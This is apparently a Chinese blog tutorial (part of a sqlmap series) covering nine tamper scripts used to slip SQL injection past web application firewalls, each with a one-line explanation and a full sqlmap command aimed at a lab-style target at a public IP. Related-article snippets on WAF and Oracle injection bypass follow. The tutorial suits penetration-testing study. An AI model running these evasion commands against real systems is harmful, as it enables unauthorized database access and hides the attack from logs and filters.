sqlmap oracle绕过,sqlmap从入门到精通-第七章-7-23 绕过WAF脚本-剩下所有的绕过脚本-终结...

最新推荐文章于 2023-08-14 16:40:26 发布
最新推荐文章于 2023-08-14 16:40:26 发布
阅读量247 收藏 2
点赞数 1
文章标签: sqlmap oracle绕过

48. sp_password.py脚本

在payload语句后面添加sp_password 这样是为了迷惑数据库日志,适用于所有数据库

测试地址:python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="sp_password.py" --proxy="http://127.0.0.1:8080" -batch

367323d0607f41515f3fda16131e8842.png

edbed184ba31fb30ed1eebf0d8275167.png

发现是可以注入的,看下burp抓包结果

aa4d4cc417e84f145306f1daee60f2ee.png

发现结果是符合预想的,添加了sp_password,不影响结果,而且是可以正常注入的

==============================================================================================================================================================================================================

49. symboliclogical.py脚本

使用"&&"(%26%26)替换"and",使用"||"(%7C%7C)替换"or" 适用于所有数据库

测试地址:python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="symboliclogical.py" --proxy="http://127.0.0.1:8080" -batch

0ae36b578115052528e8b3d3636eff66.png

4f244548c1bd0d74d9ad3453a2a0fccb.png

确认目标是可以正常注入的,我们看下burp抓包效果

bcafc052e173214616175a5e5cdc6a71.png

达到效果,使用&&替换and

========================================================================================================================================================================================================

50. unionalltounion.py脚本

使用union select 替换union all select 适用于所有数据库

测试地址:python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="unionalltounion.py" --proxy="http://127.0.0.1:8080" -batch

6c24e1e3400347173e3801b1bade12ae.png

431f6d76c0f394e78f499a8448002946.png

可以正常的进行sql注入,看burp抓包结果

6a6aab68a136b11217c2f359d7848ed8.png

看到的最终结果是没有带all的union查询,具体大家可以再去测试

============================================================================================================================================================================================================

51. unmagicquotes.py脚本

使用宽字符“ ’”(编码值为%bf%27) 绕过GPC addslashes 适用于所有数据库

测试地址:python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="unmagicquotes.py" --proxy="http://127.0.0.1:8080" -batch

add28e2e37c9ce86939291d6f727ef8c.png

002810235747d8c9267083829fbb432f.png

结果是可以注入的,我们看看brup抓包情况

b8f80a3ce530d3c5ddea24d7b8698b25.png

效果明显,加了宽字符,%bf%27

===============================================================================================================================================================================================================

52. uppercase.py脚本

将测试的payload大写,适用于所有数据库

测试地址:python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="uppercase.py" --proxy="http://127.0.0.1:8080" -batch

72b4470a835af84befb2c69892bcc293.png

2029cf378781f641ad42a48b55c2edb6.png

这个绕过参数只是变大写,是可以正常注入的,我们看下brup抓包结果,验证我们的预期猜想

096ba372afdf4ce58a0bdc02eb60816b.png

看的出来都是大写

===============================================================================================================================================================================================================

53. varnish.py脚本

添加一个HTTP头 "X-originating-IP" 来绕过WAF,适用于所有数据库

测试地址:python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="varnish.py" --proxy="http://127.0.0.1:8080" -batch

0114d7cf1b3ea63160a5e86f2ccc818d.png

d1d93d0098d08396c46075fb33dc32bf.png

可以正常注入,看看burp抓包的结果是否含有此绕过参数添加的HTTP请求头

ac5383dc1fad342d50437e1e85191cc1.png

确实添加了一个HTTP头,效果明显

===============================================================================================================================================================================================================

54. versionedkeywords.py脚本

对不是函数的关键字进行注释 适用于mysql数据库

测试地址:python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="versionedkeywords.py" --proxy="http://127.0.0.1:8080" -batch

cbd5727571d5f99516d7e565d529f23a.png

34a7295c96083b1dc093feb95fb96a5d.png

看burp抓包效果

afe83ff0bc69e8f259df5ee1a9d8730f.png

效果很明显,对不是函数的关键字进行了注释

==============================================================================================================================================================================================================

55. versionedmorekeywords.py脚本

注释每个关键字,这个是适用于数据库为mysql>=5.1.13

测试地址:python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="versionedmorekeywords.py" --proxy="http://127.0.0.1:8080" -batch

f843b1d085626f1a30bc16b9633f6198.png

3019f3bb15f534fa5bb1aaa7e186a040.png

burp抓包结果查看

b55f6c38b6dd17c3fd37b55d6afc5b66.png

上图中看下面的解码确实是每个关键字都注释了

===============================================================================================================================================================================================================

56. xforwardedfor.py脚本

添加一个伪造好的HTTP头,"X-Forwarded-For" 用来绕过WAF,适用于所有数据库

测试地址:python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="xforwardedfor.py" --proxy="http://127.0.0.1:8080" -batch

853df5fa80ae65a2f3055181e762dfd1.png

6907c31b10a7766c9231b181041b22a1.png

burp的抓包结果

577795c2e07a1abaf2b0d786756398de.png

这里的效果是非常好非常明显,不仅仅加了X-Forwarded-For还加了其他常见的HTTP头,并且添加了随机的ip地址

weixin_39646018
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqlmap oracle绕过,sqlmap的篡改绕过WAF
weixin_39790738的博客
04-04 247
space2comment.pyReplaces space character (‘ ‘) with comments ‘/**/’Example:* Input: SELECT id FROM users* Output: SELECT/**/id/**/FROM/**/usersTested against:* Microsoft SQL Server 2005* MySQL 4, 5.0 ...
sqlmap实战oracle,sqlmap从入门到精通-第七章-7-3 绕过WAF脚本-4-7脚本
weixin_39534002的博客
04-14 136
4. base64encode.py脚本给指定的payload全部字符进行base64编码,适用于所有数据库,这个很好理解,直接看演示实战演示:测试地址:python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="base64encode.py" --proxy="http://127.0.0.1:8080" -bat...
使用sqlmap 绕过防火墙进行注入测试
whatday的专栏
03-08 2773
0x00 前言    现在的网络环境往往是WAF/IPS/IDS保护着Web 服务器等等,这种保护措施往往会过滤挡住我们的SQL注入查询链接,甚至封锁我们的主机IP,所以这个时候,我们就要考虑怎样进行绕过,达到注入的目标。因为现在WAF/IPS/IDS都把sqlmap 列入黑名单了,呵呵!但是本文基于sqlmap 进行绕过注入测试,介绍至今仍然实用有效的技巧,以下策略在特定的环境能够成功绕过
oracle绕过防火墙,最全最简单ORACLE穿过WINDOWS防火墙的方法
weixin_28680865的博客
04-15 592
oracle穿过windows防火墙的方法原来oracle客户端连接服务器,用的是随机端口,如果数据库服务器装在windows上,就会有问题了。通过下边的方法来解决Oracle通过Windows防火墙的方法:1、在Windows防火墙上设置开放 TCP 1521端口(Oracle TNSListener),使用telnet oracle服务器ip 1521 测试端口是否开放;2、打开注册表,找到H...
19、SQL注入SQLMAP绕过WAF
山兔的博客
08-14 2396
搜索引擎会对我们的网站进行爬取,因为它的收录就是对我们的网站采取爬虫技术,而且速度很快,也是符合拦截规则的,但是WAF却不会去拦截,因为WAF会去识别你这个是用户访问,还是搜索引擎爬取,所以我们可以通过数据包的伪造,伪造成搜索引擎,对目标的网站进行访问,这个时候waf肯定会放行,因为它觉得这个是搜索引擎的访问,是正常的、官方的一种收录行为,不会是用户的攻击行为。一个是获取IP是不是通过脚本去获取,如果是的话,可以去伪造IP,通过tcp/udp网络层方式获取的,那是没有办法伪造的。
渗透测试必备神器SQLMAP的所有绕waf脚本合集
最新发布
10-18
综上所述,SQLMAP是一个强大的渗透测试工具,其绕WAF脚本集合是针对不同情况下的解决方案库。掌握和运用SQLMAP,能够帮助安全从业者更好地发现和评估Web应用程序的安全状况,及时修复SQL注入漏洞,保护数据安全。在...
sqlmapproject-sqlmap-1.5.7-1.zip
09-28
9. **绕过安全机制**:它可以绕过各种防御机制,如WAF(Web应用防火墙)。 10. **易于使用**:SQLmap提供命令行界面,具有丰富的参数选项,使得新手也能快速上手。 在压缩包"sqlmapproject-sqlmap-1f3a141"中,...
sqlmapproject-sqlmap-1.5.8
08-14
这些技术的实现得益于其强大的字典和数据生成策略,可以有效地绕过WAF(Web应用防火墙)和其他安全防护措施。 2. **数据提取**:找到注入点后,SQLMap可以读取数据库中的表名、列名,并进一步获取数据。它可以自动...
sqlmap-1.3.7-19.zip
07-12
6. **隐写术支持**:可以使用隐藏数据的方法,如Base64编码,绕过WAF(Web应用防火墙)的检测。 7. **多线程和并发**:支持多线程和并发请求,加快扫描速度。 8. **自定义脚本**:允许用户编写自定义的Python插件...
sqlmap-wiki-zhcn::syringe:可能是最完整的sqlmap中文文档
02-04
- **绕过WAF**:针对Web应用防火墙,SQLMap提供了一些技巧和方法来规避检测。 - **批量处理**:支持批量处理多个目标,如通过文件导入URL列表。 - **POST请求**:处理POST数据时,需要指定`--data`参数。 **文档...
oracle sql注入绕过,Oracle DBMS绕过登录访问控制漏洞
weixin_35513122的博客
04-05 915
BUGTRAQ ID: 16287CVE(CAN) ID: CVE-2006-0256Oracle Database是一款大型商业数据库系统。Oracle Database的登录过程实现存在漏洞,远程攻击者可能在登录过程中对服务器进行SQL注入攻击。在登录过程中,协议认证部分由两个步骤组成,包含有两个不同的客户端请求和两个服务器响应。第一个请求(消息代码0x76)仅包含有用户名,而第二个请求(消...
oracle注入靶机,记录一次Oracle注入waf
weixin_29359765的博客
04-12 563
这个注入挺特殊的,是ip头注入。我们进行简单的探测:首先正常发起一次请求,我们发现content-type是76探测注入我习惯性的一个单引号:一个单引号我发现长度还是76我开始尝试单引号,双引号一起:我失败了长度还是76一般sql注入输入单引号一般长度都会有些变化。我记录深入探测,我输入'--%20返回了200,并且长度是0,这让我产生了一丝好奇。这里很有可能存在注入哦。我继续探测:输入--%20...
sqlmap刷sqllibs_04-过滤绕过-23-28
Xor0ne
07-29 1792
本篇文章中的一些过滤讲解大部分来自于我的另外一篇博客,如果不太清楚,可以移步: Sqllibs-Less23-28 每一关我都尽量试了一下,有些可以有些不太行,关于不太行的,我后续进阶玩法的时候再慢慢补上,如果您看到的时候我还没有补上,可能是我忘记了,可以私信催我一下啦! 23、less23-Error Based-no comments 如上,可得本关过滤了注释符 # 和 - -。 在本关中类似于第一关,但是对于id进行了注释符的过滤,因此我们需要利用参数 - - tamper = versionedk
sqlmap注入之tamper绕过WAF防火墙过滤
热门推荐
ru_li的专栏
05-19 1万+
每当注入的时候看到这个贱贱的提示框,内心有千万只草泥马在奔腾。   但很多时候还是得静下来分析过滤系统到底过滤了哪些参数,该如何绕过sqlmap中的tamper给我们带来了很多防过滤的脚本,非常实用,可能有的朋友还不知道怎样才能最有效的利用tamper脚本。 当然使用脚本之前需要确定的就是系统过滤了哪些关键字,比如单引号、空格、select、union、admin等等。 所以
python的编码模块char_关于sqlmap当中tamper脚本编码绕过原理的一些总结(学习python没多久有些地方肯定理解有些小问题)...
weixin_35792236的博客
02-21 240
sqlmap中tamper脚本分析编写置十对一些编码实现的脚本,很多sqlmap里面需要引用的无法实现,所以有一部分例如keywords就只写写了几个引用了一下,其实这里很多脚本运用是可以绕过安全狗的。本人也是刚开始学习python没多久,有一些错误的话请指正chardoubleencode.py:对给定的payload全部字符使用双重url编码:import stringimport syspa...
Oracle 注入bypass总结(艰难的心路历程)
weixin_42508548的博客
11-24 1797
文前先感谢大家的支持,上篇Oracle数据库注入总结想着后续学习一下如何进行利用,getshell的,奈何技术还太菜了,再加上项目压力大,所以就慢慢搁置了。这里先出一篇bypass的,文中仅针对Oracle数据库,但是bypass手法我认为万变不离其宗,思想上是通用的,希望能够对大家有所帮助。 0x01 环境准备 一、安装Oracle数据库 1、首先下载数据库安装软件 具体可以从参考这里,我是从他的百度云下载的Windows10下安装Oracle 11g_勿忘初心的博客-CSDN博客_win10安装o
SQLMAP插件tamper模块介绍
永远是少年
08-25 1577
今天继续给大家介绍渗透测试相关知识,本文主要内容是SQLMAP插件tamper模块介绍。在SQLMAP中,有很多tamper插件,常用的tamper插件及其作用如下所示: **1、apostrophemast.py** 该脚本可以将payload中所有的引号替换成utf-8的格式 **2、base64encode.py** 该脚本可以将payload替换成Base64编码的格式。 **3、multiplespaces.py** 该脚本可以将payload中关
渗透测试技术----工具使用(四)--SQLMap使用方法
wwl012345的博客
08-29 2491
一、SQLMap介绍 1.SQLMap简介 SQLMap是一个自动化的SQL注入工具,其主要功能是扫描、发现并利用给定的URL的SQL注入漏洞,内置了很多绕过插件,是一款自动进行SQL注入的非常好用的工具。 2.SQLMap支持的数据库 MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access、IBM DB2、SQLite、F...
SQLMAP绕过WAF:全面解析与实战应用
它包含了一系列绕过WAF(Web应用防火墙)的脚本,适用于多种数据库系统,如MySQL、Oracle等。通过这些脚本,渗透测试者可以在防火墙无法识别的情况下,探测和利用SQL注入漏洞,从而提升安全评估的效率和准确性。此...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值